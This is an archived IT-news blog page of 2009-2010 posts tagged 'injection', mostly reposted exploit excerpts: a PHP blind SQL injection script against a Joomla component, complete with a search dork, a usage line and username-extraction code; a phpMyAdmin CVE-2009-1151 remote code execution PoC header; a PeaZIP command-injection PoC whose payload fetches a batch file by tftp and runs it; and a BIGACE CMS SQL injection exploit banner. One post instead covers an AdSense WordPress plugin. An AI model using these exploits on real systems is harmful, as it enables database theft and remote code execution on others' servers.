GO IT WORLD | IT TECH | IT NEWS » injection

Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

jason — Fri, 26 Feb 2010 09:44:47 +0000

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge

… Read the rest

WordPress Adsense Injection : Randomly Insert Ads in Posts

jason — Wed, 22 Jul 2009 09:28:11 +0000

Ad blindness is a common problem, which makes your visitors ignore your similar looking and always single position google adsense ads. Adsense Injection wordpress plugin will let you insert ads randomly in your post, reduce ad blindness and increase clicks.

Earlier I had pointed to another excellent AdSense Deluxe WordPress Pluginthat lets you insert Google Adsense / Yahoo Ads into blog posts easily. But there were no random ads insertion and you decided where to insert the ads.

The new Adsense Injection wordpress plugin just takes a random paragraph break in your article and inserts google adsense code. It… Read the rest

phpMyAdmin PHP Code Injection Exploit

jason — Wed, 10 Jun 2009 05:38:29 +0000

# CVE-2009-1151: phpMyAdmin ‘/scripts/setup.php’ PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems*… Read the rest

PeaZIP commpressed filename command injection poc exploit

jason — Sun, 07 Jun 2009 11:56:17 +0000

PeaZIP <= 2.6.1 commpressed filename command injection poc exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://peazip.sourceforge.net/

tested against: peazip 2.5.1, 2.6.1 for Windows

a pipe vulnerability exists in the way peazip handles file entries,
prepare the .zip file, open with it, then double click the compressed text file,
a cmd shell is launched …

<?php

#change, cannot use slashes or backslashes here
$cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";

class zipfile
{
    var $datasec      = array();
    var $ctrl_dir     = array();
   … Read the rest

BIGACE CMS 2.5 Remote SQL Injection Exploit

jason — Wed, 13 May 2009 13:11:58 +0000

#!/usr/bin/perl
#***********************************************************************************************
#***********************************************************************************************
#**	       										      **
#**  											      **
#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []
#**							                                      **
#**    											      **
#**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O

… Read the rest